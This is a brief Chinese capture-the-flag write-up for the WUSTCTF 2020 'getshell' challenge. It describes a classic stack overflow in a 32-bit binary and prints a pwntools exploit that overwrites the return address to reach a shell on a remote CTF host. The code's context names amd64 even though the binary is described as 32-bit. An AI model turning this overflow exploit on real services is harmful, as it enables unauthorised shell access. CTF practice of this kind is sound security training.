[WUSTCTF 2020]getshell
查看发现是32位文件
进入main发现vulnerable()双击进入
单纯的典型栈溢出
发现了system和binsh
exp:
from pwn import *
context(os='linux',arch='amd64',log_level='debug')
io = remote('node5.anna.nssctf.cn','20261')
main = 0x804851b
padding = b'a'*(0x18+0x4)
payload = padding + p32(main)
io.sendline(payload)
io.interactive()
题目虽然很简单,但是flag有点难找。flag在root下的ctf里面
感冒了今天偷个小懒........